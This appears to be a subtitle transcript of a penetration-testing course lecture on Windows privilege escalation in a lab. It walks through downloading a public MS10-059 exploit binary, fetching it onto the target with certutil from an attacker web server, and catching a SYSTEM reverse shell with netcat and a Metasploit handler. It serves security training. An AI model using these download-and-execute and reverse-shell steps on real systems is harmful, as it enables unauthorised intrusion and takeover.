1 00:00:00,960 --> 00:00:02,870 Hi, within this lecture,
2 00:00:02,910 --> 00:00:11,310 we're going to see how we can escalate our privileges with a manual exploit, or manually leverage a privilege
3 00:00:11,320 --> 00:00:12,730 escalation opportunity.
4 00:00:12,900 --> 00:00:22,680 OK, so far I have managed to show you how to manually download an exploit into your Windows shell,
5 00:00:22,830 --> 00:00:28,190 but we haven't actually executed it, so we haven't seen how it works.
6 00:00:28,770 --> 00:00:35,060 So I'm going to find one that will not run with the Metasploit modules.
7 00:00:35,280 --> 00:00:41,490 OK, so I actually opened the Windows exploit suggester over here, the Metasploit exploit suggester.
8 00:00:41,730 --> 00:00:50,520 And we're going to go for one of the suggested vulnerabilities over here, which is MS10-059,
9 00:00:50,820 --> 00:00:52,020 which is this one.
10 00:00:52,310 --> 00:00:58,260 OK, and as you can see, it says that this service could allow elevation of privilege.
11 00:00:58,860 --> 00:01:06,330 So this is again an exploit, or we can use this to escalate our privilege, but it doesn't have that
12 00:01:06,330 --> 00:01:08,050 module in Metasploit.
13 00:01:08,520 --> 00:01:15,390 So what I'm going to do, if you come over here, you can check to see yourselves that we don't have MS10-059
14 00:01:15,390 --> 00:01:17,540 over there.
15 00:01:17,940 --> 00:01:24,930 So rather than searching it in Metasploit, I'm just going to go and search it in Google and
16 00:01:24,930 --> 00:01:26,460 find the exploit itself.
17 00:01:27,180 --> 00:01:29,270 So I'm going to open Google over here.
18 00:01:29,610 --> 00:01:33,340 So let's close this down and just go to google.com.
19 00:01:33,660 --> 00:01:36,230 OK, let's close everything else over here.
20 00:01:36,780 --> 00:01:43,170 So I'm going to paste this and just search for MS10-059 exploit.
21 00:01:43,560 --> 00:01:50,760 OK, so as you can see, we get a lot of results back, and it starts with GitHub, and it's also in
22 00:01:50,760 --> 00:01:54,230 Exploit-DB and Rapid7 here as well.
23 00:01:54,870 --> 00:01:56,340 So far so good.
24 00:01:56,370 --> 00:01:58,920 So I believe we have another one over here.
25 00:01:59,940 --> 00:02:08,790 But I want to draw your attention to this GitHub page, which actually contains this MS10-059
26 00:02:08,790 --> 00:02:11,160 exe file.
27 00:02:11,520 --> 00:02:16,600 OK, and apparently the usage of this file is very easy.
28 00:02:16,860 --> 00:02:21,470 All we have to do is just run it with these parameters over here, OK?
29 00:02:21,480 --> 00:02:25,940 And it will just escalate our privilege like this.
30 00:02:26,730 --> 00:02:31,700 So we're going to see how to use it and how to give this command.
31 00:02:32,520 --> 00:02:38,940 But before we come over there, let me try to find some more information about this exploit.
32 00:02:39,390 --> 00:02:44,970 And I believe there is not so much of an in-depth description in Exploit-
33 00:02:44,970 --> 00:02:51,570 DB as well. As you can see, it only says that an attacker can exploit this issue to execute arbitrary
34 00:02:51,570 --> 00:02:53,570 code with system-level privileges.
35 00:02:53,790 --> 00:03:00,870 So all we are doing over here is just exploiting some kind of vulnerability, and it can lead us
36 00:03:00,870 --> 00:03:06,840 to execute arbitrary code, and it has the code in here.
37 00:03:06,840 --> 00:03:10,050 So it has the code on the Offensive Security site.
38 00:03:10,560 --> 00:03:12,490 OK, if we click there?
39 00:03:12,780 --> 00:03:20,820 No, it doesn't let us see the code, but we can always go for that zip file and see the code ourselves.
40 00:03:21,450 --> 00:03:28,530 Of course, we can try to search for this on Rapid7 here as well, but I don't believe we have a good
41 00:03:28,530 --> 00:03:29,510 thing over here.
42 00:03:29,820 --> 00:03:32,190 So let me try to save this file.
43 00:03:32,500 --> 00:03:38,280 As the zip file, and let me try to find that file in my downloads folder.
44 00:03:39,030 --> 00:03:40,460 So let's see.
45 00:03:40,500 --> 00:03:41,400 Yeah, here you go.
46 00:03:41,850 --> 00:03:50,010 As you can see, we have the source code over here, so we can try to compile it ourselves.
47 00:03:50,370 --> 00:03:57,760 And as you can see, it only gives us the descriptions and instructions for compilation of this file.
48 00:03:58,170 --> 00:04:03,380 OK, but I'm going to just delete this because we have already found the file.
49 00:04:03,630 --> 00:04:10,010 I just wanted to show you that if you don't trust the exe files, you can just compile it yourselves.
50 00:04:10,440 --> 00:04:12,780 But again, why not?
51 00:04:12,790 --> 00:04:13,570 Why not?
52 00:04:13,590 --> 00:04:16,050 We try these files ourselves.
53 00:04:16,800 --> 00:04:24,660 The GitHub page that I have shown you is actually a very good page, and actually a very comprehensive page
54 00:04:24,660 --> 00:04:28,410 when it comes to Windows privilege escalation.
55 00:04:28,410 --> 00:04:33,900 And it has a lot of exe files embedded in it, so you can't trust that one.
56 00:04:33,900 --> 00:04:35,700 So let me show you one more time.
57 00:04:35,970 --> 00:04:39,120 So this is the one that I'm talking about, SecWiki.
58 00:04:39,450 --> 00:04:42,130 OK, just make sure you follow this page.
59 00:04:42,130 --> 00:04:43,470 Just like this page.
60 00:04:43,740 --> 00:04:44,730 Follow this page.
61 00:04:44,970 --> 00:04:48,960 And as you can see, there are a lot of repositories over here.
62 00:04:48,960 --> 00:04:55,850 What we are interested in is the Windows kernel exploits, but it also has the Linux kernel exploits
63 00:04:55,860 --> 00:04:56,580 here as well.
64 00:04:56,790 --> 00:04:59,820 And as you can see, we have a lot of different
65 00:05:00,480 --> 00:05:03,900 exploits for each kind of vulnerability over here.
66 00:05:04,620 --> 00:05:13,260 So what we are trying to find is MS10-059, but when you find a kernel exploit or kernel vulnerability
67 00:05:13,260 --> 00:05:14,030 in Windows,
68 00:05:14,250 --> 00:05:16,070 just make sure you come over here.
69 00:05:16,590 --> 00:05:21,360 So I'm going to download the MS10-059.exe to my Kali Linux.
70 00:05:21,600 --> 00:05:27,630 It will just give me a warning, but I'm going to say open and find the file in my downloads folder.
71 00:05:27,750 --> 00:05:33,000 I'm going to cut this and put it in my file system,
72 00:05:33,000 --> 00:05:37,680 /var/www/html, and here you go.
73 00:05:38,040 --> 00:05:44,670 So this is sitting in my web server's root so I can reach it from the outside world.
74 00:05:44,670 --> 00:05:51,530 So I'm going to rename this to ms10-059.exe.
75 00:05:51,840 --> 00:05:54,780 OK, so it would be easy for me to find.
76 00:05:55,830 --> 00:06:02,940 And right now we have the Metasploit Meterpreter session actually; if I run sessions -l, we are in the
77 00:06:02,970 --> 00:06:07,080 Meterpreter. I'm going to background this and show you that I have the session.
78 00:06:07,500 --> 00:06:12,750 OK, as you can see, we have the session, but we're going to pretend that we don't even have a Meterpreter
79 00:06:12,750 --> 00:06:20,040 session in this case, so that we can actually try to see what happens if we don't have Meterpreter.
80 00:06:20,100 --> 00:06:24,450 OK, so I'm going to exit out of this one and just do the thing from scratch.
81 00:06:24,660 --> 00:06:33,480 I'm going to go into Metasploit, OK, by running msfconsole on my machine, and we can try to
82 00:06:33,480 --> 00:06:37,610 get the session back from that exploit in Metasploit.
83 00:06:37,620 --> 00:06:39,600 Of course, that would be our first choice.
84 00:06:39,930 --> 00:06:44,480 But if it doesn't work, we can always listen with netcat as well.
85 00:06:44,760 --> 00:06:46,410 So let's see how it works.
86 00:06:46,560 --> 00:06:49,710 I'm going to go into use exploit/multi/handler.
87 00:06:49,890 --> 00:06:59,670 I'm going to set the payload to windows/meterpreter/reverse_tcp, OK, and I'm going to show the options.
88 00:06:59,670 --> 00:07:04,440 I'm going to set the LHOST to my own IP address, which is tun0.
89 00:07:04,590 --> 00:07:08,160 I'm going to set the LPORT to 4242.
90 00:07:08,370 --> 00:07:16,020 I'm going to exploit this, and I'm gonna go back to my exe and run it so that I have the session over
91 00:07:16,020 --> 00:07:16,420 here.
92 00:07:16,800 --> 00:07:17,620 So here you go.
93 00:07:17,620 --> 00:07:18,540 We have the session.
94 00:07:19,020 --> 00:07:24,510 So what I'm going to do, I'm going to go into that session, and as you can see, it's session
95 00:07:24,510 --> 00:07:32,190 one, so you can just interact with it, OK, in order to just download this from our web server.
96 00:07:32,460 --> 00:07:35,280 So it's sitting on my root right now.
97 00:07:35,640 --> 00:07:41,250 So I'm going to come over here and run sessions 1, and I'm going to go into the shell.
98 00:07:41,250 --> 00:07:47,100 As I said before, we're going to pretend that we don't even have the Metasploit session or a Meterpreter
99 00:07:47,100 --> 00:07:47,580 session.
100 00:07:47,970 --> 00:07:53,250 So I'm going to go into the temp folder, as we have seen before, and I'm going to run certutil.
101 00:07:53,520 --> 00:07:55,920 So I'm going to say certutil -urlcache.
102 00:07:55,920 --> 00:08:00,480 And for the -f, I'm going to just specify the http://
103 00:08:00,830 --> 00:08:03,000 10.10.14.19/ms
104 00:08:03,690 --> 00:08:06,080 10-059.exe.
105 00:08:06,090 --> 00:08:10,700 And I'm going to call this ms10-059.exe.
106 00:08:10,980 --> 00:08:15,510 OK, so it will be downloaded to my temp folder over here.
107 00:08:15,630 --> 00:08:21,390 And once we download this, we have to actually have this file in our temp folder.
108 00:08:21,390 --> 00:08:24,900 Let's see, it says online, and here you go.
109 00:08:24,900 --> 00:08:26,580 It says completed successfully.
110 00:08:26,580 --> 00:08:31,020 If I run dir, then we can see the ms10-059.exe over here.
111 00:08:31,410 --> 00:08:32,570 So far, so good.
112 00:08:32,850 --> 00:08:38,520 Now we need to run this file, and we need to listen for incoming connections.
113 00:08:38,760 --> 00:08:41,130 OK, on Kali Linux, obviously.
114 00:08:41,610 --> 00:08:49,560 Now, if I run ms10-059.exe, it will say that Chimichurri, or Kemistry, I don't know how it's pronounced,
115 00:08:49,560 --> 00:08:58,490 but it apparently gives us the local system shell if we use this with IP address and port, with IP address
116 00:08:58,500 --> 00:08:58,910 and port.
117 00:08:59,340 --> 00:09:03,390 So this is kind of a back door, but we need to run it manually.
118 00:09:03,840 --> 00:09:06,630 So it's very easy for us to do that.
119 00:09:06,630 --> 00:09:11,670 All we have to do is just supply our IP address along with the port number.
120 00:09:12,000 --> 00:09:13,320 So I'm going to supply it.
121 00:09:13,620 --> 00:09:14,760 And for the port,
122 00:09:14,760 --> 00:09:17,300 no, I'm just going to go with 1234.
123 00:09:17,640 --> 00:09:25,080 Now again, you can try to get this reverse shell back in Metasploit as well, but we're pretending
124 00:09:25,080 --> 00:09:29,700 that we don't have anything to do with msfconsole or Metasploit itself.
125 00:09:30,240 --> 00:09:38,220 So I believe we can go for netcat in order to listen for incoming connections, and then choose and see
126 00:09:38,220 --> 00:09:42,450 what happens if we get the shell back with netcat again.
127 00:09:42,450 --> 00:09:49,110 It's advantageous to get this with Meterpreter, but I don't think this exploit gives us the Meterpreter
128 00:09:49,110 --> 00:09:49,950 shell anyway.
129 00:09:50,310 --> 00:09:56,370 So I'm going to go for nc -nvlp 1234, OK, and I'm going to hit enter over here,
130 00:09:56,760 --> 00:09:59,400 and this will just run the Chimichurri.
131 00:09:59,490 --> 00:10:01,600 Or whatever it is.
132 00:10:02,020 --> 00:10:10,590 OK, and let's see if we get the connection here, let's wait for a minute, and let's see if we can get
133 00:10:10,590 --> 00:10:11,540 the connection.
134 00:10:12,540 --> 00:10:19,480 Um, yeah, it seems like it's working, but we don't get the connection for some reason.
135 00:10:20,040 --> 00:10:21,450 Let's try to.
136 00:10:21,450 --> 00:10:22,430 Yeah, here you go.
137 00:10:22,740 --> 00:10:24,180 It gives us something.
138 00:10:24,180 --> 00:10:25,230 And yeah, here you go.
139 00:10:25,230 --> 00:10:26,030 We have the shell.
140 00:10:26,340 --> 00:10:27,270 So if I run
141 00:10:27,270 --> 00:10:27,840 whoami.
142 00:10:27,990 --> 00:10:28,610 Here you go.
143 00:10:28,620 --> 00:10:30,890 We are NT AUTHORITY\SYSTEM.
144 00:10:31,320 --> 00:10:34,260 So it took a while, but it gives us the shell.
145 00:10:34,260 --> 00:10:39,240 So that's what's important, and we are administrator right now, as you can see.
146 00:10:39,660 --> 00:10:47,970 So this is how you do a manual exploitation in order to gain an escalated privilege in Windows as
147 00:10:47,970 --> 00:10:48,250 well.
148 00:10:48,870 --> 00:10:54,210 So far, we have covered a lot of topics regarding Windows exploitation.
149 00:10:54,390 --> 00:11:00,180 I believe it's time to move on to another machine for Windows so that we can get to practice what we
150 00:11:00,180 --> 00:11:03,090 have learned so far and also learn something new.
151 00:11:03,480 --> 00:11:06,570 We're going to do that within the next section together.